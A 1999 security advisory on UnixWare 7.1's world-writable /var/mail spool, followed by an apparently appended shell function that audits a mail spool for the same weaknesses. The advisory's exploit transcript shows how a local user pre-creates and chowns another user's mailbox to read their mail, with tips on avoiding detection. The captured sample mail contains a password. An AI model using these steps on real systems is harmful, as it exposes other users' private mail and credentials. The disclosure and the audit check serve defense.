Date: Fri, 3 Dec 1999 21:03:43 MST
From: Brock Tellier <[email protected]>
To: [email protected]
Subject: UnixWare read/modify users' mail
Greetings,
OVERVIEW
Any user can read/modify others' mail.
BACKGROUND
Only UnixWare 7.1 was tested.
DETAILS
Imagine my surprise when I saw that /var/mail was mode 777. As such, any
user may create a file called /var/mail/<username> with a mode readable by
him and trap all incoming mail. Afraid of getting caught? chown the file
to <username> (see my advisory on this subject), leaving it still
world-readable, and no one will ever know who did it.
All of this assumes, of course, that the user has not received any mail
yet. If you keep track of your /etc/passwd file, you can monitor for new
entries and create the files as needed.
This permissions problem obviously opens the door for all sorts of
problems with symlinks and such. I would imagine that some mail delivery
programs which aren't as smart as sendmail will follow symlinks in
/var/mail.
And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG
LIE:
bash-2.02$ cat /usr/bin/mail
#!/bin/sh
cat > /dev/null
exit 0
bash-2.02$
;)
EXPLOIT
bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier
Now wait for btellier to get some mail...
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier
bash-2.02$ cat btellier
From root Sat Dec 4 07:55:29 1999
Return-Path: root
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root@localhost
Message-Id: <199912041355.HAA04842@localhost>
Status:
X-Status:
X-SCO-PAD: XXXXXX
X-SCO-UID: 1
Content-Length: 52
your ueber-secure password on 0wned.com is a@f9;se0
bash-2.02$
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
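
A defensive check for the conditions described in this post, as an added example that is not part of the original message: the shell function audit_spool (a hypothetical name) reports a world-writable spool directory, symlinks inside it, mailboxes accessible to "other", and mailboxes named after an account but owned by someone else. The finding labels are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the advisory: audit a mail spool for the conditions
# the post describes. Findings go to stdout, one per line; returns 1 if any.

audit_spool() {
    spool=$1
    findings=0
    report() { echo "$1 $2"; findings=$((findings + 1)); }

    # The root cause in the post: anyone may create entries in the spool.
    if [ -n "$(find "$spool" -prune -type d -perm -0002)" ]; then
        report DIR_WORLD_WRITABLE "$spool"
    fi

    for f in "$spool"/*; do
        name=${f##*/}
        # Symlinks planted in the spool (the post's "symlinks and such").
        if [ -L "$f" ]; then report SYMLINK "$name"; continue; fi
        [ -f "$f" ] || continue
        # A mailbox readable or writable by "other", like the 0644 file shown.
        if [ -n "$(find "$f" -prune \( -perm -0004 -o -perm -0002 \))" ]; then
            report OTHER_ACCESS "$name"
        fi
        # A mailbox named after an account but owned by someone else
        # (the state before the chown step). Skipped for unknown names.
        if id -u "$name" >/dev/null 2>&1 &&
           [ -n "$(find "$f" -prune ! -user "$name")" ]; then
            report OWNER_MISMATCH "$name"
        fi
    done
    [ "$findings" -eq 0 ]
}

# Usage: audit_spool /var/mail
```

Because the planted file in the post is chowned to the victim, the ownership check alone would miss it; the OTHER_ACCESS finding is what catches the 0644 mailbox shown in the transcript.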